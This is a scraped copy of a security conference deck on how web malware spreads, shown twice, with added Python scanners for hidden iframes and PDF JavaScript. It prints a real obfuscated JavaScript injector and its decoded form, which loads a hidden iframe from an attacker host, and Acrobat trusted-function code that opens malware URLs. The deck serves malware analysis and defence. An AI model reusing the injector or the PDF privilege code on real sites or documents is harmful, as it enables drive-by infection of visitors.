Scaling Web 2.0 Malware Infection
______________________________________

Aditya K Sood, Sr. Security Practitioner
Armorize, Santa Clara, US
Disclaimer

 All contents of this presentation represent my own beliefs and views and do not, unless
 explicitly stated otherwise, represent the beliefs of my current employer or, to that
 effect, any of my previous employers.
About Me - $whoami

  • Senior Security Practitioner, Armorize
    http://www.armorize.com

  • Founder, SECNICHE Security
    http://www.secniche.org

  • Worked previously for COSEINC as Senior Security Researcher and as Security
    Consultant for KPMG

  • Author of written content for HITB E-Zine, Hakin9, ELSEVIER and USENIX journals
  • Like to do bug hunting and malware dissection
  • Released advisories to forefront companies
  • Active speaker at security conferences including RSA
 Agenda

   Understanding The Malware Anatomy

   The Vertical Risk – Malware Impact on Business

   Top 10+ Web Malware Infection Strategies

   2X Generation - Century Malware Trickeries

   Case Study – Infection through PDF Trusted Functions

   Demonstration
 Pattern




            Understanding The Malware Anatomy
                    The Dependent Peripherals
 Malware Mess – Global Trifecta
 Malware Infection Rate
 Malware Retrospective and Classification

     Top 5 Malware Categories                     Top 5 Virus Families

     Trojan      (31.2 %)                         Stuh       (4.4 %)
     Downloader  (25.6 %)                         Fraudload  (3.9 %)
     Backdoor    (13.8 %)                         Monder     (3.6 %)
     Spyware     (13.2 %)                         Autorun    (2.7 %)
     Adware       (4.9 %)                         Buzus      (2.7 %)

                                 Interdependency
 Malware - The Impact on Real World
 Malware Trends – The Attack Base

  Financial abuse and mass identity theft

  The mass destructor – botnet infection and zombie hosts

  Exploiting the link dependency – pay-per-click hijacking

  Traffic manipulation – open redirect vulnerabilities at large scale

  Spyware, cryptovirology, ransomware, etc.

  Distributed Denial of Service – the service death game, extortion

  Industry change semantics – malware activation change line

  Infection through browsers and portable gadgets – the biggest step

  Exploiting anti-virus loopholes
 Malware Contributing Issues – Rising Steps
  Publicly available malware source code

  Malware distribution frameworks such as MPACK, NeoSploit, etc.

  Unpatched vulnerabilities and loosely coupled patches

  Demand for underground services and self exposure

  Global surveillance mode and information stealing in the wild

  Software discrepancies and inherited design flaws, such as in browsers

  Exploitation at the web level is easy, and it opens a door to system-level fallacies

  Inappropriate security solutions deployed and an irrelevant security paradigm

  Botnet infection – the easy way to launch diversified attacks

  Web sharing and centralized work functionality
 Pattern




            Understanding The Vertical Risk
              Web Delivered Malware Impact on Business

            Underground Market and Malware Flow Model
 Underground Malware Market Business - Statistics




 © GDATA
 Practical Malware Flow Model



                                   Malware Writers Role




    Flow of Malware Websites



 © Reihe Informatik. TR-2007-011
 Malware - The Impact on Real World
 Pattern




                Malware – Sources of Infection

                                 Web 2.0
            Top 10 + Strategies of Distributing Malware through Web
Long Live Drive By Download – Base Web Malware Tactic
(SEO) Poisoning – Driven with Malware
Messengers – Infection at Instant State
 Networking Websites – TWITTER Malware Infection

 Exploiting the trust relationship on social networking websites

 Spreading malware content through tweets, scraps, etc.

 Chain reaction – spreads very fast in website networks (URL shortening trick)
 Social Networking – FACEBOOK Malware Applications

 Manipulating the Open API Calls

 User centric control

 Exploiting the design fallacies
 Social Networking – FACEBOOK MAIL Infection

               Step 1




                                       Step 2




          Step 3
 Online Media Content – You Tube, Google Videos etc !!
 Exploiting the Web of Trust – Human Touch
 Spywares , Ransom Wares and other Variants etc.
 Insidious Spamming – Email , Blogs , Redirectors etc
Botnets – Malware Infection at Large Scale
 Direct Malware Hosting – Infected Web Domains
 System Stringency – Exploiting the Exceptions
Malware Kits – Automated Infection
 Case Study – Safety Labs Malware Infection

 Malware infecting the websites of a security service provider.

               ____________________________________________________________

 It is unfortunate that even a security solution provider is touched by the latest Internet IFRAME
 threats, or rather infections.

 Thousands of websites on the Internet have been compromised with malicious IFRAMEs which load exploit
 code designed to silently install trojans onto susceptible victim computers.
 Case Study – Safety Labs Malware Infection


  OBFUSCATED JAVASCRIPT
  Script source is http://www.safety-lab.com/audits/categorylist.pl?lang=en

  <script language=javascript>
  function mdban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,9,52,47,48,11,7,35,
  59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34,
  0,58,40,31,60,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);
  for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;
  if(s){r+=String.fromCharCode(221^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}
  mdban('ZT8MVN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9
  QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5ML
  E0DMXICGRADF@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5
  Y7@HD')</script><!-- 213.219.250.100 -->
 Case Study – Safety Labs Malware Infection



                                                         Complexity factor is always high in decoding
  DEOBFUSCATED JAVASCRIPT                                         the malicious JavaScript.

  (1) Decoded JavaScript that eval() runs

  window.status = 'DONE';
  document.write('<iframe name=5B8F src="HTTP://3PIGS.INFO/T/?' + Math.round(Math.random() *
  14490) + '5B8F' + '" width=322 height=45 style="display:none"></iframe>')

  (2) Result written by the decoded JavaScript

  <iframe name=5B8F src="HTTP://3PIGS.INFO/T/?58965B8F" width=322 height=45 style="display:none">
  </iframe>

  "HTTP://3PIGS.INFO/T/?58965B8F" was injected as the source of the malicious file.
 2X Generation Malware Trickeries
  System File Patching and Code Injection

  Code Interdependency – Malware Adjacency - Code Resuscitation.

  Code Randomization, Obfuscation and Morphing

  Rootkits and System Cloaking

 Exploiting ActiveX and JavaScript Heaps – Direct Control
 Escaping What !




 Malware Analysis Methodology (MAM) - Overview
 End Point Communication
      Connection state check
      Server identity checks through the communication medium
      Error generation, e.g. checksum integrity
      Encrypted data in packets
      Protocol switching

 Session Stream Analysis – Deep Inspection
      Analyzing the TCP stream session
      Extracting an executable from the raw data

 Behavioral Analysis – Scrutinizing system fallacies
      Active debugging
      Black box testing approach

 Static Analysis – Reversing the facets of malware
      It's all about analyzing the code of the malware
 Case Study – Malware Infection




                   PDF Trusted Functions
                 (Understanding the Facets of Malware)
 Some PDF Truths
 Hyperlink execution is notified through alerts

 Data is not allowed to be stored in the forms
          http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf

 A number of vulnerable functions have been removed, i.e. taken out of the registered state

 Support for Adobe Reader 7.xx has been removed
          http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html

 Other alerts have been structured as security checks in standalone PDFs

 Acrobat JavaScript (Acro JS) does not support the DOM as normal JavaScript does.

 Adobe has inbuilt functionality that provides code wrappers which call restricted functions in
 specific environments. For example, in general it is not possible to generate another PDF
 from a standalone PDF when it is opened.
 Understanding Malware Infection - PDF
 Exploiting the browser – Downloading files through Windows Media Player




   Exploiting the Global Access of JavaScript folder in PDF




                      Hidden gift.js file containing malicious code is placed here
 Understanding Malware Infection - PDF
 Calling Codes through Trusted Functions

 The trusted function body calls app.beginPriv() (begin privileges) and app.endPriv() (end
  privileges) to enclose the function body and code that are to run as trusted.

 The trusted function method can only be called successfully while the application initializes,
  and a certain number of restricted functions can then be called through it.

   myTrustedFunction = app.trustedFunction(
       function() { <function body> } );

   New Scareware Message – Opening a new PDF

   trustedDoc = app.trustedFunction( function (width, height)
   {
       app.beginPriv();
       var trustDoc = app.newDoc(width, height);
       trustDoc.addWatermarkFromText("X JERKED X");
       app.endPriv();
       return trustDoc;
   });
   trustedDoc(300, 300);
 Understanding Malware Infection - PDF
 Calling Codes through Trusted Propagator Functions

   myPropagatorFunction = app.trustPropagatorFunction(
       function() { <function body> } );

   URL Opening - Drive by Download Infections

   trustedDoc = app.trustedFunction(
       function (cURL, bNewFrame)
       {
           app.beginPriv();
           var trustedDoc = app.launchURL(cURL, bNewFrame);
           app.endPriv();
           return trustedDoc;
       }
   );
   trustedDoc("http://www.malware1.com", true);
   trustedDoc("http://www.malware2.com", true);
   trustedDoc("http://www.malware3.com", true);
   trustedDoc("http://www.malware4.com", true);
   trustedDoc("http://www.malware5.com", true);
 Understanding Malware Infection - PDF
 Demonstration
 Questions and Queries
 Thanks and Regards



             Special thanks to Armorize for pushing me to do more research.
                                http://www.armorize.com
     __________________________________________________________________________________


                                       Portal and Blog
      SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com


                       (Screenshots shared from various resources)

Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test Suite
 

Scaling Web 2.0 Malware Infection

  • 10. Malware Trends – The Attack Base
      • Financial abuse and mass identity theft
      • The mass destructor – botnet infection and zombie hosts
      • Exploiting the link dependency – pay-per-click hijacking
      • Traffic manipulation – open redirect vulnerabilities at large scale
      • Spyware, cryptovirology, ransomware etc.
      • Distributed Denial of Service – the service death game, extortion
      • Industry change semantics – malware activation change line
      • Infection through browsers and portable gadgets – the biggest step
      • Exploiting anti-virus loopholes
  • 11. Malware Contributing Issues – Rising Steps
      • Publicly available malware source code
      • Malware distribution frameworks such as MPACK, NeoSploit etc.
      • Unpatched vulnerabilities and loosely coupled patches
      • Demand for underground services and self exposure
      • Global surveillance mode and information stealing in the wild
      • Software discrepancies and inherited design flaws, such as in browsers
      • Exploitation at the web level is easy; it opens a door to system-level fallacies
      • Inappropriate security solutions deployed and irrelevant security paradigms
      • Botnet infection – the easy way to launch diversified attacks
      • Web sharing and centralized work functionality
  • 12. Pattern: Understanding The Vertical Risk – Web Delivered Malware Impact on Business – Underground Market and Malware Flow Model
  • 13. Underground Malware Market Business – Statistics (© GDATA)
  • 14. Practical Malware Flow Model – Malware Writers' Role, Flow of Malware Websites (© Reihe Informatik, TR-2007-011)
  • 15. Malware – The Impact on Real World
  • 16. Pattern: Malware – Sources of Infection – Web 2.0 Top 10+ Strategies of Distributing Malware through Web
  • 17. Long Live Drive By Download – Base Web Malware Tactic
  • 18. SEO Poisoning – Driven with Malware
  • 19. Messengers – Infection at Instant State
  • 20. Social Networking Websites – TWITTER Malware Infection
      • Exploiting the trust relationship on social networking websites
      • Spreading malware content through tweets, scraping etc.
      • Chain reaction – spreads very fast in website networks (URL shortening trick)
  • 21. Social Networking – FACEBOOK Malware Applications
      • Manipulating the Open API calls
      • User-centric control
      • Exploiting the design fallacies
  • 22. Social Networking – FACEBOOK MAIL Infection (Step 1, Step 2, Step 3)
  • 23. Online Media Content – YouTube, Google Videos etc.
  • 24. Exploiting the Web of Trust – Human Touch
  • 25. Spyware, Ransomware and other Variants
  • 26. Insidious Spamming – Email, Blogs, Redirectors etc.
  • 27. Botnets – Malware Infection at Large Scale
  • 28. Direct Malware Hosting – Infected Web Domains
  • 29. System Stringency – Exploiting the Exceptions
  • 30. Malware Kits – Automated Infection
  • 31. Case Study – Safety Labs Malware Infection
      Malware infecting the security service provider websites.
      It is unfortunate that even a security solution provider has been touched by the latest Internet IFRAME threats, or rather infections. Thousands of websites on the Internet have been compromised with malicious iframes which load exploit code designed to silently install trojans onto susceptible victim computers.
  • 32. Case Study – Safety Labs Malware Infection
  • 33. Case Study – Safety Labs Malware Infection
      Script source is obfuscated JavaScript.
      http://www.safety-lab.com/audits/categorylist.pl?lang=en

      <script language=javascript>
      function mdban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,9,52,47,48,11,7,35,59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34,0,58,40,31,60,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(221^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}
      mdban('ZT8MVN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5MLE0DMXICGRADF@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5Y7@HD')
      </script><!-- 213.219.250.100 -->
  • 34. Case Study – Safety Labs Malware Infection
      Complexity factor is always high in decoding the malicious JavaScript.
      DEOBFUSCATED JAVASCRIPT
      (1) The decoded JavaScript eval()s:
      window.status = 'DONE';
      document.write('<iframe name=5B8F src="http://3pigs.info/t/?' + Math.round(Math.random() * 14490) + '5B8F' + '" width=322 height=45 style="display:none"></iframe>')
      (2) The decoded JavaScript writes this result:
      <iframe name=5B8F src="http://3pigs.info/t/?58965B8F" width=322 height=45 style="display:none"></iframe>
      "http://3pigs.info/t/?58965B8F" was injected as the source for the malicious file.
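A defender-side check for the pattern the decoded script produces, added here as an example and not part of the original deck: it parses a page for iframes that are hidden by CSS and point at a foreign host, and for inline scripts that either write an <iframe> through document.write or build code at runtime from charCodeAt / String.fromCharCode and hand it to eval. The sample page, the attacker.example host and the placeholder payload are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit
# Runtime-built code, as in the decoder above (charCodeAt / String.fromCharCode feeding eval):
# two of these markers together flag a script; a document.write of an <iframe> is flagged alone.
EVAL_MARKERS = [r"\beval\s*\(", r"String\.fromCharCode", r"\.charCodeAt\s*\("]
IFRAME_WRITE = re.compile(r"document\.write\s*\(\s*['\"]\s*<iframe", re.I)

class PageCollector(HTMLParser):
    # gathers <iframe> attribute dicts and complete inline <script> bodies
    def __init__(self):
        super().__init__()
        self.iframes, self.scripts, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})
        elif tag == "script":
            self._buf = []
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append("".join(self._buf)); self._buf = None
    def handle_data(self, data):
        if self._buf is not None: self._buf.append(data)

def is_hidden_external_iframe(attrs, page_host):
    # invisible by CSS and loading a host other than the page's own
    style = attrs.get("style", "").replace(" ", "").lower()
    invisible = "display:none" in style or "visibility:hidden" in style
    host = (urlsplit(attrs.get("src", "")).hostname or "").lower()
    return invisible and bool(host) and host != page_host.lower()

def scan_html(html, page_host):
    p = PageCollector()
    p.feed(html); p.close()
    findings = [("hidden_iframe", f.get("src", "")) for f in p.iframes if is_hidden_external_iframe(f, page_host)]
    for body in p.scripts:
        if IFRAME_WRITE.search(body):
            findings.append(("script_writes_iframe", body.strip()[:40]))
        hits = [pat for pat in EVAL_MARKERS if re.search(pat, body)]
        if len(hits) >= 2:
            findings.append(("obfuscated_script", "+".join(hits)))
    return findings

# Constructed sample page (not the real Safety Labs HTML): a benign same-site iframe, the decoded
# writer from slide 34, a skeleton XOR-221 decoder with a placeholder payload, and the hidden iframe.
SAMPLE_HTML = """<html><body><h1>Audits</h1>
<iframe src="http://www.example.org/widget" width="300" height="200"></iframe>
<script>document.write('<iframe name=5B8F src="http://attacker.example/t/?' + Math.round(Math.random() * 14490) + '5B8F" width=322 height=45 style="display:none"></iframe>')</script>
<script>function d(x){var r='';for(var i=0;i<x.length;i++){r+=String.fromCharCode(x.charCodeAt(i)^221);}eval(r);}d('PLACEHOLDER');</script>
<iframe name=5B8F src="http://attacker.example/t/?58965B8F" width=322 height=45 style="display:none"></iframe>
</body></html>"""
```

Running scan_html(SAMPLE_HTML, "www.example.org") reports the hidden foreign iframe, the script that writes one, and the eval-based decoder, while the same-site widget iframe passes.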
  • 35. 2X Generation Malware Trickeries
      • System file patching and code injection
      • Code interdependency – malware adjacency – code resuscitation
      • Code randomization, obfuscation and morphing
      • Rootkits and system cloaking
      • Exploiting ActiveX and JavaScript heaps – direct control
  • 36. Escaping What! (Private & Confidential Property of Armorize)
  • 37. Malware Analysis Methodology (MAM) – Overview
      End Point Communication
        • Connection state check
        • Server identity checks through the communication medium
        • Error generation, like checksum integrity
        • Encrypted data in packets
        • Protocol switching
      Session Stream Analysis – Deep Inspection
        • Analyzing the TCP stream session
        • Extracting an executable from the raw data
      Behavioral Analysis – Scrutinizing system fallacies
        • Active debugging
        • Black box testing approach
      Static Analysis – Reversing the facets of malware
        • It's all about analyzing the code of the malware
  • 38. Case Study – Malware Infection through PDF Trusted Functions (Understanding the Facets of Malware)
  • 39. Some PDF Truths
      • Hyperlink execution notification as alerts
      • Data is not allowed to be stored in the forms: http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf
      • A number of vulnerable functions have been removed, i.e. taken out of the registered state
      • Support for Adobe Reader 7.xx has been removed: http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html
      • Other alerts have been structured as security checks in standalone PDFs
      • Acro JS does not support the DOM as normal JavaScript does. Adobe has inbuilt functionality to provide code wrappers which call restricted functions in specific environments. For example: in general, it is not possible to generate another PDF from a standalone PDF when it is opened.
  • 40. Understanding Malware Infection – PDF
      • Exploiting the browser – downloading files through Windows Media Player
      • Exploiting the global access of the JavaScript folder in PDF (a hidden gift.js file containing malicious code is placed here)
  • 41. Understanding Malware Infection – PDF
      • Calling codes through trusted functions
      • The trusted function body calls app.beginPriv (begin privileges) and app.endPriv (end privileges) to enclose any type of function and code to be trusted.
      • The trusted function method can be called successfully on the initialization of the application, and it is possible to call a certain number of restricted functions through it.

      myTrustedFunction = app.trustedFunction( function() { <function body> } );

      New Scareware Message – Opening a new PDF

      trustedDoc = app.trustedFunction( function (width, height) {
          app.beginPriv();
          var trustDoc = app.newDoc(width, height);
          trustDoc.addWatermarkFromText("X JERKED X");
          app.endPriv();
          return trustDoc;
      });
      trustedDoc(300, 300);
  • 42. Understanding Malware Infection – PDF
      • Calling codes through trusted propagator functions

      myPropagatorFunction = app.trustPropagatorFunction( function() { <function body> } );

      URL Opening – Drive-by Download Infections

      trustedDoc = app.trustedFunction( function (cURL, bNewFrame) {
          app.beginPriv();
          var trustedDoc = app.launchURL(cURL, bNewFrame);
          app.endPriv();
          return trustedDoc;
      });
      trustedDoc("http://www.malware1.com", true);
      trustedDoc("http://www.malware2.com", true);
      trustedDoc("http://www.malware3.com", true);
      trustedDoc("http://www.malware4.com", true);
      trustedDoc("http://www.malware5.com", true);
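As an added example (not the deck's code), a minimal triage script that pulls the JavaScript actions out of a PDF, inflating FlateDecode streams, and reports which of the privilege wrappers and restricted APIs named in slides 41 and 42 each script calls. The sample PDF, its object layout and the malware-host.example URL are constructed; the parser covers only literal strings and single-object streams, not object streams, cross-reference streams or other filters.

```python
import re
import zlib
# Privilege wrappers from the slides above and the restricted calls they are used to unlock.
PRIV_API = ["app.trustedFunction", "app.trustPropagatorFunction",
            "app.beginPriv", "app.endPriv", "app.launchURL", "app.newDoc"]

def _literal(data, start):
    # PDF literal string at data[start] == b'('; handles nested parentheses and backslash escapes
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":
            out += data[i + 1:i + 2]; i += 2; continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0: return bytes(out)
        if c != b"(" or depth > 1:
            out += c
        i += 1
    return bytes(out)

def _stream(data, objnum):
    # body of stream object objnum, inflated when its dictionary names /FlateDecode
    m = re.search(rb"(?<!\d)%d\s+\d+\s+obj(.*?)stream\r?\n(.*?)\r?\nendstream" % objnum, data, re.S)
    if not m: return b""
    return zlib.decompress(m.group(2)) if b"/FlateDecode" in m.group(1) else m.group(2)

def extract_javascript(pdf):
    # every /JS action body: inline (literal) or indirect "n 0 R" stream reference
    out = []
    for m in re.finditer(rb"/JS\s*(\(|(\d+)\s+\d+\s+R)", pdf):
        body = _literal(pdf, m.start(1)) if m.group(1) == b"(" else _stream(pdf, int(m.group(2)))
        if body: out.append(body.decode("latin-1"))
    return out

def flag_privileged_calls(pdf):
    # pair each embedded script with the privileged Acrobat APIs it names
    return [(js, [api for api in PRIV_API if api in js]) for js in extract_javascript(pdf)]

# Constructed sample PDF: OpenAction runs the slide's launchURL wrapper from a FlateDecode
# stream (object 5); the page carries a benign inline /JS literal with nested parentheses.
SLIDE_JS = (b"trustedDoc = app.trustedFunction(function (cURL, bNewFrame) {"
            b" app.beginPriv(); app.launchURL(cURL, bNewFrame); app.endPriv(); });"
            b' trustedDoc("http://malware-host.example/", true);')
_Z = zlib.compress(SLIDE_JS)
SAMPLE_PDF = (b"%PDF-1.4\n1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /JavaScript /JS 5 0 R >> >> endobj\n"
              b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
              b'3 0 obj << /Type /Page /Parent 2 0 R /AA << /O << /S /JavaScript /JS (app.alert("nested (ok)")) >> >> >> endobj\n'
              + (b"5 0 obj << /Length %d /Filter /FlateDecode >>\nstream\n" % len(_Z)) + _Z + b"\nendstream endobj\n%%EOF\n")
```

flag_privileged_calls(SAMPLE_PDF) attributes app.trustedFunction, app.beginPriv, app.endPriv and app.launchURL to the OpenAction script and nothing to the page's alert.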
  • 43.  Understanding Malware Infection - PDF
  • 45. Questions and Queries
  • 46. Thanks and Regards. Special thanks to Armorize for pushing me to do more research. http://www.armorize.com
      Portal and Blog: SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com
      (Screenshots shared from various resources)